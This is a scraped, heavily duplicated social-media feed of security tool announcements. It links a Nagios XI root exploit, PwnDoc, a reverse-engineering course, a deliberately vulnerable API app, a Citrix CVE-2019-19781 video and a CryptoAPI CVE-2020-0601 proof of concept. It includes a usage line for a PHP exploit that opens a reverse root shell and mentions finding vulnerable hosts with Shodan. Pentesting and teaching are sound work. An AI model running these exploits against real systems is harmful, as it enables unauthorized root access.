nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI
Photos from National Cyber Security Services's post
PwnDoc:-- #Pentesting #report generator.
#PwnDoc is a #pentest reporting #application making it simple and easy to write your findings and generate a customizable docx report. The main goal is to have more time to Pwn and less time to Doc by mutualizing data like #vulnerabilities between users.
#Download #Link:-
https://github.com/pwndoc/pwndoc
PwnDoc:-- #Pentesting #report generator.
#PwnDoc is a #pentest reporting #application making it simple and easy to write your findings and generate a customizable docx report. The main goal is to have more time to Pwn and less time to Doc by mutualizing data like #vulnerabilities between users.
#Download #Link:-
https://github.com/pwndoc/pwndoc
Z0FCourse_ReverseEngineering:-- #Reverse #engineering course by Z0F. Focuses on x64 #Windows.
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
Z0FCourse_ReverseEngineering:-- #Reverse #engineering course by Z0F. Focuses on x64 #Windows.
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
Z0FCourse_ReverseEngineering:-- #Reverse #engineering course by Z0F. Focuses on x64 #Windows.
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
Websheep:-- #Websheep is an app based on a willingly #vulnerable #ReSTful #APIs.
#Download #Link:--
https://github.com/marmicode/websheep
Websheep:-- #Websheep is an app based on a willingly #vulnerable #ReSTful #APIs.
#Download #Link:--
https://github.com/marmicode/websheep
#Download #Link:--
https://github.com/marmicode/websheep
Websheep:-- #Websheep is an app based on a willingly #vulnerable #ReSTful #APIs.
#Download #Link:--
https://github.com/marmicode/websheep
Photos from National Cyber Security Services's post
#Citrix #ADC #vulnerability explanation and #exploitation. This video shows how to find hosts #vulnerable to CVE-2019-19781. Vulnerable hosts can be found easily using #Shodan.
#Link:- https://www.youtube.com/watch?v=cALcgyq42kI
To learn more:
1. https://support.citrix.com/article/CT...
2. https://www.exploit-db.com/exploits/4...
#Citrix #ADC #vulnerability explanation and #exploitation. This video shows how to find hosts #vulnerable to CVE-2019-19781. Vulnerable hosts can be found easily using #Shodan.
#Link:- https://www.youtube.com/watch?v=cALcgyq42kI
To learn more:
1. https://support.citrix.com/article/CT...
2. https://www.exploit-db.com/exploits/4...
CryptoAPI:-- A #PoC for CVE-2020-0601
#Windows #CryptoAPI #Spoofing #Vulnerability #exploitation.
#Download #Link:-
https://github.com/kudelskisecurity/chainoffools
CryptoAPI:-- A #PoC for CVE-2020-0601
#Windows #CryptoAPI #Spoofing #Vulnerability #exploitation.
#Download #Link:-
https://github.com/kudelskisecurity/chainoffools
#Windows #CryptoAPI #Spoofing #Vulnerability #exploitation.
#Download #Link:-
https://github.com/kudelskisecurity/chainoffools
CryptoAPI:-- A #PoC for CVE-2020-0601
#Windows #CryptoAPI #Spoofing #Vulnerability #exploitation.
#Download #Link:-
https://github.com/kudelskisecurity/chainoffools